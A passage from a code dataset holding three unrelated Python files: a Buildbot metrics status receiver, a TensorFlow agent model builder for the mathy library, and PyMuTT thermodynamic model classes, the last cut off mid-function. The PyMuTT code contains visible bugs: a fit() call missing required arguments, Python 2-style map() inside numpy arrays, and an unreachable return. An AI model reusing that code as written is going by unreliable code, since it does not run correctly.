StatusReceiverMultiService.__init__(self)\n self.status = None\n self.thread_pool = threadpool.ThreadPool(1, 1)\n self.loop = task.LoopingCall(self.updateMetricsAndFlush)\n\n def startService(self):\n StatusReceiverMultiService.startService(self)\n self.status = self.parent.getStatus()\n self.status.subscribe(self)\n\n self.thread_pool.start()\n self.loop.start(60, now=False)\n\n def stopService(self):\n self.loop.stop()\n self.thread_pool.stop()\n return StatusReceiverMultiService.stopService(self)\n\n @defer.inlineCallbacks\n def updateMetricsAndFlush(self):\n try:\n yield self.updateMetrics()\n finally:\n self.thread_pool.callInThread(self._flush_and_log_exceptions)\n\n @defer.inlineCallbacks\n def updateMetrics(self):\n uptime.set(time.time() - SERVER_STARTED, fields={'master': ''})\n accepting_builds.set(bool(self.status.master.botmaster.brd.running),\n fields={'master': ''})\n pool = self.status.master.db.pool\n pool_queue.set(pool.q.qsize(), fields={'master': ''})\n pool_waiting.set(len(pool.waiters), fields={'master': ''})\n pool_working.set(len(pool.working), fields={'master': ''})\n\n for 
builder_name in self.status.getBuilderNames():\n fields = {'builder': builder_name, 'master': ''}\n builder = self.status.getBuilder(builder_name)\n slaves = builder.getSlaves()\n\n connected.set(sum(1 for x in slaves if x.connected), fields=fields)\n current_builds.set(len(builder.getCurrentBuilds()), fields=fields)\n state.set(builder.currentBigState, fields=fields)\n total.set(len(slaves), fields=fields)\n\n # Get pending build requests directly from the db for all builders at\n # once.\n d = self.status.master.db.buildrequests.getBuildRequests(claimed=False)\n\n # Timeout the database request after 5 seconds.\n def timeout():\n if not d.called:\n d.cancel()\n reactor.callLater(5, timeout)\n\n try:\n brdicts = yield d\n except Exception as ex:\n log.err(ex, 'getBuildRequests failed while failed populating metrics')\n else:\n pending_per_builder = collections.defaultdict(int)\n for brdict in brdicts:\n pending_per_builder[brdict['buildername']] += 1\n\n for builder_name, count in pending_per_builder.iteritems():\n pending_builds.set(count,\n fields={'builder': builder_name, 'master': ''})\n\n def _flush_and_log_exceptions(self):\n try:\n ts_mon.flush()\n except Exception:\n log.err(None, 'Automatic monitoring flush failed.')\n","sub_path":"scripts/master/monitoring_status_receiver.py","file_name":"monitoring_status_receiver.py","file_ext":"py","file_size_in_byte":4530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"455698776","text":"import os\nimport pickle\nimport time\nfrom pathlib import Path\nfrom shutil import copyfile\nfrom typing import Any, Callable, Dict, List, Optional, Tuple, cast\n\nimport numpy as np\nimport srsly\nimport tensorflow as tf\nfrom tensorflow.keras import backend as K\nfrom tf_siren import SinusodialRepresentationDense, SIRENModel\nfrom wasabi import msg\n\nfrom mathy_core.expressions import MathTypeKeysMax\nfrom ..env import MathyEnv\nfrom ..envs import PolySimplify\nfrom ..state import (\n MathyInputsType,\n MathyObservation,\n MathyWindowObservation,\n ObservationFeatureIndices,\n observations_to_window,\n)\nfrom mathy_core.util import print_error\nfrom .config import AgentConfig\n\n\ndef build_agent_model(\n config: AgentConfig = None, predictions: int = 6, name=\"embeddings\"\n) -> tf.keras.Model:\n if config is None:\n config = AgentConfig()\n nodes_in = tf.keras.layers.Input(shape=(None,), dtype=tf.int32, name=\"nodes_in\")\n values_in = tf.keras.layers.Input(shape=(None,), dtype=tf.float32, name=\"values_in\")\n type_in = tf.keras.layers.Input(shape=(None, 2), dtype=tf.float32, name=\"type_in\")\n time_in = tf.keras.layers.Input(shape=(None, 1), dtype=tf.float32, name=\"time_in\")\n token_embedding = tf.keras.layers.Embedding(\n input_dim=MathTypeKeysMax,\n output_dim=config.embedding_units,\n name=\"nodes_input\",\n mask_zero=True,\n )\n values_dense = SinusodialRepresentationDense(\n config.units,\n name=\"values_input\",\n kernel_initializer=\"siren_first_uniform\",\n w0=30.0,\n )\n type_dense = SinusodialRepresentationDense(\n config.units,\n name=\"type_input\",\n kernel_initializer=\"siren_first_uniform\",\n w0=30.0,\n )\n time_dense = SinusodialRepresentationDense(\n config.units,\n name=\"time_input\",\n kernel_initializer=\"siren_first_uniform\",\n w0=30.0,\n )\n siren_mlp = SIRENModel(\n units=config.units, final_units=config.units, num_layers=6, name=\"siren\",\n )\n policy_net = tf.keras.Sequential(\n [\n tf.keras.layers.TimeDistributed(\n SinusodialRepresentationDense(\n predictions, 
name=\"policy_ts_hidden\", activation=None,\n ),\n name=\"policy_logits\",\n ),\n tf.keras.layers.LayerNormalization(name=\"policy_layer_norm\"),\n ],\n name=\"policy_head\",\n )\n value_net = tf.keras.Sequential(\n [\n SinusodialRepresentationDense(config.units, name=\"value_hidden\"),\n SinusodialRepresentationDense(1, name=\"value_logits\", activation=None),\n ],\n name=\"value_head\",\n )\n reward_net = tf.keras.Sequential(\n [\n SinusodialRepresentationDense(\n config.units, name=\"reward_hidden\", activation=\"relu\",\n ),\n tf.keras.layers.LayerNormalization(name=\"reward_layer_norm\"),\n SinusodialRepresentationDense(1, name=\"reward_logits\", activation=None),\n ],\n name=\"reward_head\",\n )\n # Model\n sequence_inputs = siren_mlp(\n tf.concat(\n [\n token_embedding(nodes_in),\n values_dense(tf.expand_dims(values_in, axis=-1)),\n type_dense(type_in),\n time_dense(time_in),\n ],\n axis=-1,\n name=\"input_vectors\",\n )\n )\n sequence_mean = tf.reduce_mean(sequence_inputs, axis=1)\n values = value_net(sequence_mean)\n reward_logits = reward_net(sequence_mean)\n logits = policy_net(sequence_inputs)\n inputs = [\n nodes_in,\n values_in,\n type_in,\n time_in,\n ]\n outputs = [logits, values, reward_logits]\n out_model = tf.keras.Model(inputs=inputs, outputs=outputs, name=name)\n\n lr_schedule = tf.keras.optimizers.schedules.ExponentialDecay(\n config.lr_initial,\n decay_steps=config.lr_decay_steps,\n decay_rate=config.lr_decay_rate,\n staircase=config.lr_decay_staircase,\n )\n out_model.opt = tf.keras.optimizers.Adam(learning_rate=lr_schedule)\n out_model.predictions = predictions\n return out_model\n\n\nAgentModel = tf.keras.Model\n\n\ndef _load_model(model_path: Path, predictions: int) -> AgentModel:\n model = tf.keras.models.load_model(str(model_path))\n model.opt = model.optimizer\n model.predictions = predictions\n return model\n\n\ndef get_or_create_agent_model(\n config: AgentConfig,\n predictions: int,\n is_main=False,\n required=False,\n env: MathyEnv = None,\n) -> AgentModel:\n if env is None:\n env = PolySimplify()\n observation: MathyObservation = env.state_to_observation(env.get_initial_state()[0])\n initial_state: MathyWindowObservation = observations_to_window([observation])\n\n if not os.path.exists(config.model_dir):\n os.makedirs(config.model_dir)\n model_path: Path = Path(config.model_dir) / config.model_name\n model = build_agent_model(config=config, predictions=predictions, name=\"agent\")\n model.compile(optimizer=model.opt, loss=\"binary_crossentropy\", metrics=[\"accuracy\"])\n model.build(initial_state.to_input_shapes())\n if model_path.is_dir():\n if is_main and config.verbose:\n with msg.loading(f\"Loading model: {model_path}...\"):\n model = _load_model(model_path, predictions)\n msg.good(f\"Loaded model: {model_path}\")\n else:\n model = _load_model(model_path, predictions)\n elif required:\n print_error(\n ValueError(\"Model Not Found\"),\n f\"Cannot find model: {model_path}\",\n print_error=False,\n )\n elif is_main:\n cfg = f\"{config.model_dir}{os.path.sep}model.config.json\"\n if config.verbose:\n msg.info(f\"wrote model config: {cfg}\")\n srsly.write_json(cfg, config.dict(exclude_defaults=False))\n\n return model\n\n\ndef load_agent_model(\n model_data_folder: str, silent: bool = False\n) -> Tuple[AgentModel, AgentConfig]:\n meta_file = Path(model_data_folder) / \"model.config.json\"\n if not meta_file.exists():\n raise ValueError(f\"model meta not found: {meta_file}\")\n args = AgentConfig(**srsly.read_json(str(meta_file)))\n model_file = 
Path(model_data_folder) / args.model_name\n if not model_file.exists():\n raise ValueError(f\"model not found: {model_file}\")\n env: MathyEnv = PolySimplify()\n observation: MathyObservation = env.state_to_observation(env.get_initial_state()[0])\n initial_state: MathyWindowObservation = observations_to_window([observation])\n init_inputs = initial_state.to_inputs()\n init_shapes = initial_state.to_input_shapes()\n model: AgentModel = build_agent_model(\n config=args, predictions=env.action_size, name=\"agent\"\n )\n model.compile(optimizer=model.opt, loss=\"mse\", metrics=[\"accuracy\"])\n model.build(init_shapes)\n model.predict(init_inputs)\n\n if not silent:\n with msg.loading(f\"Loading model: {model_file}...\"):\n _load_model(model_file, env.action_size)\n msg.good(f\"Loaded model: {model_file}\")\n model.summary()\n else:\n _load_model(model_file, env.action_size)\n return model, args\n","sub_path":"libraries/mathy_python/mathy/agent/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":7196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"143365829","text":"# -*- coding: utf-8 -*-\n\"\"\"\nEmpirical models.\n\"\"\"\n\nimport inspect\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom warnings import warn\nfrom scipy.stats import variation\nfrom PyMuTT import _pass_expected_arguments\nfrom PyMuTT import constants as c\nfrom pprint import pprint\n\nclass BaseThermo:\n \"\"\"The Thermodynamic Parent class.\n Holds properties of a specie, the statistical-mechanical thermodynamic model.\n\n Attributes\n ----------\n name : str\n Name of the specie.\n phase : str\n Phase of the specie.\n G - gas.\n S - surface.\n elements : dict\n Composition of the species.\n Keys of dictionary are elements, values are stoichiometric values in a formula unit.\n e.g. CH3OH can be represented as:\n {'C': 1, 'H': 4, 'O': 1,}.\n thermo_model : `PyMuTT.models.statmech` object\n Statistical thermodynamic model.\n Object should have the following methods: `get_CpoR`, `get_HoRT`, `get_SoR`, `get_GoRT`.\n T_ref : float\n Temperature (in K) at which `HoRT_dft` was calculated. Only used for fitting empirical coefficients.\n HoRT_dft : float\n Dimensionless enthalpy calculated using DFT that corresponds to `T_ref`. Only used for fitting empirical coefficients.\n HoRT_ref : float\n Reference dimensionless enthalpy corresponding to `T_ref`.\n references : `PyMuTT.models.empirical.References.references` object\n Contains references to calculate `HoRT_ref`. 
If not specified then HoRT_dft will be used without adjustment.\n notes : str\n Any additional details you would like to include such as computational set up.\n\n \"\"\"\n\n def __init__(self, name, phase=None, elements=None, thermo_model=None,\n T_ref=c.T0('K'), HoRT_dft=None, HoRT_ref=None,\n references=None, notes=None, **kwargs):\n self.name = name\n self.phase = phase\n self.elements = elements\n self.T_ref = T_ref\n self.references = references\n self.notes = notes\n\n #Assign self.thermo_model\n if inspect.isclass(thermo_model):\n #If class is passed, the required arguments will be guessed.\n self.thermo_model = _pass_expected_arguments(thermo_model, **kwargs)\n else:\n self.thermo_model = thermo_model\n\n #Calculate dimensionless DFT energy using thermo model\n if (HoRT_dft is None) and (self.thermo_model is not None):\n self.HoRT_dft = self.thermo_model.get_HoRT(Ts=self.T_ref)\n else:\n self.HoRT_dft = HoRT_dft\n\n if HoRT_ref is None: #Assign self.HoRT_ref\n if (references is None) or (self.HoRT_dft is None):\n self.HoRT_ref = self.HoRT_dft\n else:\n self.HoRT_ref = self.HoRT_dft + references.get_HoRT_offset(\n elements=elements, Ts=self.T_ref)\n else:\n self.HoRT_ref = HoRT_ref\n\n def __repr__(self):\n out = ['{} object for Name: {}'.format(\n self.__class__.__name__, self.name)]\n for key, val in self.__dict__.items():\n if key != 'name':\n out.append('\\t{}: {}'.format(key, val))\n return '\\n'.join(out)\n\n\n def plot_empirical(self, T_low=None, T_high=None, Cp_units=None,\n H_units=None, S_units=None, G_units=None):\n \"\"\"Plot the thermodynamic profiles between ``T_low`` and ``T_high``\n using empirical relationship\n\n Parameters:\n T_low : float\n Lower temperature in K. If not specified, ``T_low`` attribute\n used.\n T_high : float\n Upper temperature in K. If not specified, ``T_high`` attribute\n used.\n Cp_units : str\n Units to plot heat capacity. See ``PyMuTT.constants.R`` for\n accepted units. If not specified, dimensionless units used.\n H_units : str\n Units to plot enthalpy. See ``PyMuTT.constants.R`` for accepted\n units but omit the '/K' (e.g. J/mol). If not specified,\n dimensionless units used.\n S_units : str\n Units to plot entropy. See ``PyMuTT.constants.R`` for accepted\n units. If not specified, dimensionless units used.\n G_units : str\n Units to plot Gibbs free energy. See ``PyMuTT.constants.R`` for\n accepted units but omit the '/K' (e.g. J/mol). If not specified,\n dimensionless units used.\n\n Returns:\n figure : `matplotlib.figure.Figure`_\n Figure\n axes : tuple of `matplotlib.axes.Axes.axis`_\n Axes of the plots.\n 0. Cp\n 1. H\n 2. S\n 3. 
G\n \"\"\"\n if T_low is None:\n T_low = self.T_low\n if T_high is None:\n T_high = self.T_high\n Ts = np.linspace(T_low, T_high)\n\n f, ax = plt.subplots(4, sharex=True)\n '''\n Heat Capacity\n '''\n ax[0].set_title('Specie: {}'.format(self.name))\n Cp_plot = np.array(map(self.get_CpoR, Ts))\n if Cp_units is None:\n ax[0].set_ylabel('Cp/R')\n else:\n ax[0].set_ylabel('Cp ({})'.format(Cp_units))\n Cp_plot *= c.R(Cp_units)\n ax[0].plot(Ts, Cp_plot, 'r-')\n\n '''\n Enthalpy\n '''\n H_plot = np.array(map(self.get_HoRT, Ts))\n if H_units is None:\n ax[1].set_ylabel('H/RT')\n else:\n ax[1].set_ylabel('H ({})'.format(H_units))\n H_plot *= c.R('{}/K'.format(H_units)) * Ts\n ax[1].plot(Ts, H_plot, 'g-')\n\n '''\n Entropy\n '''\n S_plot = np.array(map(self.get_SoR, Ts))\n if S_units is None:\n ax[2].set_ylabel('S/R')\n else:\n ax[2].set_ylabel('S ({})'.format(S_units))\n S_plot *= c.R(S_units)\n ax[2].plot(Ts, S_plot, 'b-')\n\n '''\n Gibbs energy\n '''\n ax[3].set_xlabel('Temperature (K)')\n G_plot = np.array(map(self.get_GoRT, Ts))\n if G_units is None:\n ax[3].set_ylabel('G/RT')\n else:\n ax[3].set_ylabel('G ({})'.format(G_units))\n G_plot *= c.R('{}/K'.format(G_units)) * Ts\n ax[3].plot(Ts, G_plot, 'k-')\n\n return f, ax\n\n def plot_thermo_model(self, T_low=None, T_high=None, Cp_units=None,\n H_units=None, S_units=None, G_units=None):\n \"\"\"Plots the thermodynamic profiles between ``T_low`` and ``T_high``\n using empirical relationship\n\n Parameters:\n T_low : float\n Lower temperature in K.\n T_high : float\n Upper temperature in K.\n Cp_units : str\n Units to plot heat capacity. See ``PyMuTT.constants.R`` for\n accepted units. If not specified, dimensionless units used.\n H_units : str\n Units to plot enthalpy. See ``PyMuTT.constants.R`` for\n accepted units but omit the '/K' (e.g. J/mol). If not\n specified, dimensionless units used.\n S_units : str\n Units to plot entropy. See ``PyMuTT.constants.R`` for accepted\n units. If not specified, dimensionless units used.\n G_units : str\n Units to plot Gibbs free energy. See ``PyMuTT.constants.R`` for\n accepted units but omit the '/K' (e.g. J/mol). If not specified,\n dimensionless units used.\n\n Returns:\n figure : `matplotlib.figure.Figure`_\n Figure\n axes : tuple of `matplotlib.axes.Axes.axis`_\n Axes of the plots.\n 0. Cp\n 1. H\n 2. S\n 3. 
G\n \"\"\"\n if T_low is None:\n T_low = self.T_low\n if T_high is None:\n T_high = self.T_high\n Ts = np.linspace(T_low, T_high)\n\n f, ax = plt.subplots(4, sharex=True)\n '''\n Heat Capacity\n '''\n ax[0].set_title('Specie: {}'.format(self.name))\n Cp_plot = np.array(map(self.thermo_model.get_CpoR, Ts))\n if Cp_units is None:\n ax[0].set_ylabel('Cp/R')\n else:\n ax[0].set_ylabel('Cp ({})'.format(Cp_units))\n Cp_plot *= c.R(Cp_units)\n ax[0].plot(Ts, Cp_plot, 'r-')\n\n '''\n Enthalpy\n '''\n H_plot = np.array(map(self.thermo_model.get_HoRT, Ts))\n # The below function also need to take single temp\n if self.references is not None:\n offsets = np.array(\n self.references.get_HoRT_offset(elements=self.elements, Ts=Ts))\n H_plot += offsets\n\n if H_units is None:\n ax[1].set_ylabel('H/RT')\n else:\n ax[1].set_ylabel('H ({})'.format(H_units))\n H_plot *= c.R('{}/K'.format(H_units)) * Ts\n ax[1].plot(Ts, H_plot, 'g-')\n\n '''\n Entropy\n '''\n S_plot = np.array(map(self.thermo_model.get_SoR, Ts))\n if S_units is None:\n ax[2].set_ylabel('S/R')\n else:\n ax[2].set_ylabel('S ({})'.format(S_units))\n S_plot *= c.R(S_units)\n ax[2].plot(Ts, S_plot, 'b-')\n\n '''\n Gibbs energy\n '''\n ax[3].set_xlabel('Temperature (K)')\n G_plot = np.array(map(self.thermo_model.get_GoRT, Ts))\n if self.references is not None:\n offsets = np.array(\n self.references.get_HoRT_offset(elements=self.elements, Ts=Ts))\n G_plot += offsets\n\n if G_units is None:\n ax[3].set_ylabel('G/RT')\n else:\n ax[3].set_ylabel('G ({})'.format(G_units))\n G_plot *= c.R('{}/K'.format(G_units)) * Ts\n ax[3].plot(Ts, G_plot, 'k-')\n\n return f, ax\n\n def plot_thermo_model_and_empirical(self, T_low=None, T_high=None,\n Cp_units=None, H_units=None,\n S_units=None, G_units=None):\n \"\"\"Plots the thermodynamic profiles between ``T_low`` and ``T_high``\n using empirical relationship\n\n Parameters:\n T_low : float\n Lower temperature in K.\n T_high : float\n Upper temperature in K.\n Cp_units : str\n Units to plot heat capacity. See ``PyMuTT.constants.R``\n for accepted units. If not specified, dimensionless units used.\n H_units : str\n Units to plot enthalpy. See ``PyMuTT.constants.R`` for accepted\n units but omit the '/K' (e.g. J/mol). If not specified,\n dimensionless units used.\n S_units : str\n Units to plot entropy. See ``PyMuTT.constants.R`` for accepted\n units. If not specified, dimensionless units used.\n G_units : str\n Units to plot Gibbs free energy. See ``PyMuTT.constants.R`` for\n accepted units but omit the '/K' (e.g. J/mol). If not specified,\n dimensionless units used.\n\n Returns:\n figure : `matplotlib.figure.Figure`_\n Figure\n axes : tuple of `matplotlib.axes.Axes.axis`_\n Axes of the plots.\n 0. Cp\n 1. H\n 2. S\n 3. 
G\n \"\"\"\n if T_low is None:\n T_low = self.T_low\n if T_high is None:\n T_high = self.T_high\n Ts = np.linspace(T_low, T_high)\n\n f, ax = plt.subplots(4, sharex=True)\n '''\n Heat Capacity\n '''\n ax[0].set_title('Specie: {}'.format(self.name))\n Ts, Cp_plot_thermo_model, Cp_plot_empirical = self.compare_CpoR(Ts=Ts)\n if Cp_units is None:\n ax[0].set_ylabel('Cp/R')\n else:\n ax[0].set_ylabel('Cp ({})'.format(Cp_units))\n Cp_plot_thermo_model *= c.R(Cp_units)\n Cp_plot_empirical *= c.R(Cp_units)\n\n ax[0].plot(Ts, Cp_plot_thermo_model, 'r-', label = 'Stat Mech Model')\n ax[0].plot(Ts, Cp_plot_empirical, 'b-', label = 'Empirical Model')\n ax[0].legend()\n\n '''\n Enthalpy\n '''\n Ts, H_plot_thermo_model, H_plot_empirical = self.compare_HoRT(Ts=Ts)\n\n if H_units is None:\n ax[1].set_ylabel('H/RT')\n else:\n ax[1].set_ylabel('H ({})'.format(H_units))\n H_plot_thermo_model *= c.R('{}/K'.format(H_units)) * Ts\n H_plot_empirical *= c.R('{}/K'.format(H_units)) * Ts\n ax[1].plot(Ts, H_plot_thermo_model, 'r-')\n ax[1].plot(Ts, H_plot_empirical, 'b-')\n\n '''\n Entropy\n '''\n Ts, S_plot_thermo_model, S_plot_empirical = self.compare_SoR(Ts=Ts)\n if S_units is None:\n ax[2].set_ylabel('S/R')\n else:\n ax[2].set_ylabel('S ({})'.format(S_units))\n S_plot_thermo_model *= c.R(S_units)\n S_plot_empirical *= c.R(S_units)\n ax[2].plot(Ts, S_plot_thermo_model, 'r-')\n ax[2].plot(Ts, S_plot_empirical, 'b-')\n\n '''\n Gibbs energy\n '''\n ax[3].set_xlabel('Temperature (K)')\n Ts, G_plot_thermo_model, G_plot_empirical = self.compare_GoRT(Ts=Ts)\n if G_units is None:\n ax[3].set_ylabel('G/RT')\n else:\n ax[3].set_ylabel('G ({})'.format(G_units))\n G_plot_thermo_model *= c.R('{}/K'.format(G_units)) * Ts\n G_plot_empirical *= c.R('{}/K'.format(G_units)) * Ts\n ax[3].plot(Ts, G_plot_thermo_model, 'r-')\n ax[3].plot(Ts, G_plot_empirical, 'b-')\n\n return f, ax\n\n\n def compare_CpoR(self, Ts=None):\n \"\"\"Compares the dimensionless heat capacity of the statistical model\n and the empirical model\n\n Parameters\n ----------\n Ts : (N,) `numpy.ndarray`_ or float, optional\n Temperatures (in K) to calculate CpoR. If None, generates\n a list of temperatures between self.T_low and self.T_high\n Returns\n -------\n Ts : (N,) `numpy.ndarray`_\n Temperatures in K\n CpoR_statmech : (N,) `numpy.ndarray`_ or float\n Dimensionless heat capacity of statistical thermodynamic model\n CpoR_empirical :((N,) `numpy.ndarray`_ or float\n Dimensionless heat capacity of empirical model\n \"\"\"\n if Ts is None:\n Ts = np.linspace(self.T_low, self.T_high)\n\n CpoR_statmech = np.array(map(self.thermo_model.get_CpoR, Ts))\n CpoR_empirical = np.array(map(self.get_CpoR, Ts))\n\n return (Ts, CpoR_statmech, CpoR_empirical)\n\n def compare_HoRT(self, Ts=None):\n \"\"\"Compares the dimensionless enthalpy of the statistical model and\n the empirical model\n\n Parameters\n ----------\n Ts : (N,) `numpy.ndarray`_ or float, optional\n Temperatures (in K) to calculate CpoR. 
If None, generates a\n list of temperatures between self.T_low and self.T_high\n Returns\n -------\n Ts : (N,) `numpy.ndarray`_ or float\n Temperatures in K\n CpoR_statmech : (N,) `numpy.ndarray`_ or float\n Dimensionless heat capacity of statistical thermodynamic model\n CpoR_empirical :((N,) `numpy.ndarray`_ or float\n Dimensionless heat capacity of empirical model\n \"\"\"\n if Ts is None:\n Ts = np.linspace(self.T_low, self.T_high)\n\n if self.references is not None:\n H_offset = np.array(\n self.references.get_HoRT_offset(elements=self.elements, Ts=Ts))\n else:\n H_offset = np.zeros_like(Ts)\n\n HoRT_statmech = np.array(map(self.thermo_model.get_HoRT, Ts)) + H_offset\n HoRT_empirical = np.array(map(self.get_HoRT, Ts))\n\n return (Ts, HoRT_statmech, HoRT_empirical)\n\n def compare_SoR(self, Ts = None):\n \"\"\"Compares the dimensionless entropy of the statistical model and\n the empirical model\n\n Parameters\n ----------\n Ts : (N,) `numpy.ndarray`_ or float, optional\n Temperatures (in K) to calculate CpoR. If None, generates a\n list of temperatures between self.T_low and self.T_high\n Returns\n -------\n Ts : (N,) `numpy.ndarray`_ or float\n Temperatures in K\n CpoR_statmech : (N,) `numpy.ndarray`_ or float\n Dimensionless heat capacity of statistical thermodynamic model\n CpoR_empirical :((N,) `numpy.ndarray`_ or float\n Dimensionless heat capacity of empirical model\n \"\"\"\n if Ts is None:\n Ts = np.linspace(self.T_low, self.T_high)\n\n SoR_statmech = np.array(map(self.thermo_model.get_SoR, Ts))\n SoR_empirical = np.array(map(self.get_SoR, Ts))\n\n return (Ts, SoR_statmech, SoR_empirical)\n\n def compare_GoRT(self, Ts = None):\n \"\"\"Compares the dimensionless Gibbs energy of the statistical model\n and the empirical model\n\n Parameters\n ----------\n Ts : (N,) `numpy.ndarray`_ or float, optional\n Temperatures (in K) to calculate CpoR. 
If None, generates a\n list of temperatures between self.T_low and self.T_high\n Returns\n -------\n Ts : (N,) `numpy.ndarray`_ or float\n Temperatures in K\n CpoR_statmech : (N,) `numpy.ndarray`_ or float\n Dimensionless heat capacity of statistical thermodynamic model\n CpoR_empirical : (N,) `numpy.ndarray`_ or float\n Dimensionless heat capacity of empirical model\n \"\"\"\n if Ts is None:\n Ts = np.linspace(self.T_low, self.T_high)\n\n if self.references is not None:\n offsets = self.references.get_HoRT_offset(elements=self.elements,\n Ts=Ts)\n else:\n offsets = np.zeros_like(Ts)\n\n GoRT_statmech = np.array(map(self.thermo_model.get_GoRT, Ts)) + offsets\n GoRT_empirical = np.array(map(self.get_GoRT, Ts))\n\n return (Ts, GoRT_statmech, GoRT_empirical)\n\n\nclass Nasa(BaseThermo):\n \"\"\"Stores the information for an individual nasa specie\n Inherits from PyMuTT.models.empirical.BaseThermo\n\n The thermodynamic properties are calculated using the following form:\n\n :math:`\\\\frac {Cp} {R} = a_{1} + a_{2} T + a_{3} T^{2} + a_{4} T^{3} + a_{5} T^{4}`\n\n :math:`\\\\frac {H} {RT} = a_{1} + a_{2} \\\\frac {T} {2} + a_{3} \\\\frac {T^{2}} {3} + a_{4} \\\\frac {T^{3}} {4} + a_{5} \\\\frac {T^{4}} {5} + a_{6} \\\\frac {1} {T}`\n\n :math:`\\\\frac {S} {R} = a_{1} \\\\ln {T} + a_{2} T + a_{3} \\\\frac {T^{2}} {2} + a_{4} \\\\frac {T^{3}} {3} + a_{5} \\\\frac {T^{4}} {4} + a_{7}`\n\n Attributes\n ----------\n T_low : float\n Lower temperature bound (in K)\n T_mid : float\n Middle temperature bound (in K)\n T_high : float\n High temperature bound (in K)\n a_low : (7,) `numpy.ndarray_`\n NASA polynomial to use between T_low and T_mid\n a_high : (7,) `numpy.ndarray_`\n NASA polynomial to use between T_mid and T_high\n \"\"\"\n def __init__(self, T_low, T_mid, T_high, T_ref=c.T0('K'),\n HoRT_ref=None, SoR_ref=None, **kwargs):\n super().__init__(T_ref=T_ref, HoRT_ref=HoRT_ref, **kwargs)\n\n self.T_low = T_low\n self.T_high = T_high\n self.T_mid = T_mid\n\n self.fit(HoRT_dft=HoRT_ref, SoR_ref=SoR_ref)\n\n def get_a(self, temperature):\n \"\"\"Returns the correct polynomial range based on T_low, T_mid and T_high\n\n Parameters\n ----------\n temperature : float\n Temperature in K\n Returns\n -------\n a : (7,) `numpy.ndarray`_\n NASA polynomial coefficients\n \"\"\"\n if temperature < self.T_mid:\n if temperature < self.T_low:\n warn('Temperature below T_low for {}'.format(self.name), RuntimeWarning)\n return self.a_low\n else:\n if temperature > self.T_high:\n warn('Temperature above T_high for {}'.format(self.name), RuntimeWarning)\n return self.a_high\n\n def get_CpoR(self, temperature):\n \"\"\"Calculate the dimensionless heat capacity\n\n Parameters\n ----------\n temperature : float\n Temperature in K\n Returns\n -------\n CpoR : float\n Dimensionless heat capacity\n \"\"\"\n T = temperature\n a = self.get_a(T)\n T_arr = np.array([1., T, T**2, T**3, T**4, 0., 0.])\n return np.dot(a, T_arr)\n\n def get_HoRT(self, temperature):\n \"\"\"Calculate the dimensionless enthalpy\n\n Parameters\n ----------\n temperature : float\n Temperature in K\n Returns\n -------\n HoRT : float\n Dimensionless enthalpy\n \"\"\"\n T = temperature\n a = self.get_a(T)\n T_arr = np.array([1., T/2., (T**2)/3., (T**3)/4., (T**4)/5., 1./T, 0.])\n return np.dot(a, T_arr)\n\n def get_SoR(self, temperature):\n \"\"\"Calculate the dimensionless entropy\n\n Parameters\n ----------\n temperature : float\n Temperature in K\n Returns\n -------\n SoR : float\n Dimensionless entropy\n \"\"\"\n T = temperature\n a = self.get_a(T)\n 
T_arr = np.array([np.log(T), T, (T**2)/2., (T**3)/3., (T**4)/4., 0., 1.])\n return np.dot(a, T_arr)\n\n return SoR\n\n def get_GoRT(self, temperature):\n \"\"\"Calculate the dimensionless Gibbs free energy\n\n Parameters\n ----------\n temperature : float or (N,) `numpy.ndarray`_\n Temperature(s) in K\n Returns\n -------\n GoRT : float or (N,) `numpy.ndarray`_\n Dimensionless Gibbs free energy\n \"\"\"\n return self.get_HoRT(temperature) - self.get_SoR(temperature)\n\n def fit(self, T_low, T_high, T_ref=None,\n HoRT_dft=None, HoRT_ref=None, SoR_ref=None, references=None):\n \"\"\"Calculates the NASA polynomials using internal attributes\n\n Parameters\n ----------\n T_low : float\n Lower temperature to fit. If not specified, uses T_low attribute\n T_high : float\n High temperature to fit. If not specified, uses T_high attribute\n T_ref : float\n Reference temperature in K used fitting empirical coefficients.\n If not specified, uses T_ref attribute\n HoRT_dft : float\n Dimensionless enthalpy calculated using DFT that corresponds\n to T_ref. If not specified, uses HoRT_dft attribute. If the\n HoRT_dft attribute is not specified, uses\n self.thermo_model.get_HoRT\n HoRT_ref : float\n Dimensionless reference enthalpy that corresponds to T_ref.\n If this is specified, uses this value when fitting a_low[5]\n and a_high[5] instead of HoRT_dft and references\n SoR_ref : float\n Dimensionless entropy that corresponds to T_ref. If not\n specified, uses self.thermo_model.get_SoR\n references : ``PyMuTT.models.empirical.References``\n Contains references to calculate HoRT_ref. If not specified\n then HoRT_dft will be used without adjustment.\n \"\"\"\n\n '''\n Processing inputs\n '''\n\n #Get temperatures and heat capacity data\n Ts = np.linspace(self.T_low, self.T_high)\n CpoR = np.array(map(self.thermo_model.get_CpoR, Ts))\n\n #Get reference temperature\n if T_ref is None:\n T_ref = self.T_ref\n\n #Get reference enthalpy\n if HoRT_dft is None:\n if self.HoRT_dft is None:\n self.HoRT_dft = self.thermo_model.get_HoRT(T_ref)\n HoRT_dft = self.HoRT_dft\n\n #Get reference entropy\n if SoR_ref is None:\n SoR_ref = self.thermo_model.get_SoR(T_ref)\n\n #Get references\n if references is not None:\n self.references = references\n\n #Set HoRT_ref\n #If references specified\n if HoRT_ref is not None:\n self.HoRT_ref = HoRT_ref\n else:\n if self.references is not None:\n self.HoRT_ref = HoRT_dft + self.references.get_HoRT_offset(\n self.elements, Ts=self.T_ref)\n #If dimensionless DFT enthalpy specified\n elif HoRT_dft is not None:\n self.HoRT_ref = HoRT_dft\n HoRT_ref = self.HoRT_ref\n\n #Reinitialize coefficients\n self.a_low = np.zeros(7)\n self.a_high = np.zeros(7)\n\n '''\n Processing data\n '''\n self.fit_CpoR(Ts, CpoR)\n self.fit_HoRT(T_ref, HoRT_ref)\n self.fit_SoR(T_ref, SoR_ref)\n\n def fit_CpoR(self, Ts, CpoR):\n \"\"\"Fit a[0]-a[4] coefficients in a_low and a_high attributes\n given the dimensionless heat capacity data\n\n Parameters\n ----------\n Ts : (N,) `numpy.ndarray_`\n Temperatures in K\n CpoR : (N,) `numpy.ndarray_`\n Dimensionless heat capacity\n \"\"\"\n #If the Cp/R does not vary with temperature (occurs when no\n # vibrational frequencies are listed)\n if (np.mean(CpoR) < 1e-6 and np.isnan(variation(CpoR))) or \\\n variation(CpoR) < 1e-3 or all(np.isnan(CpoR)):\n 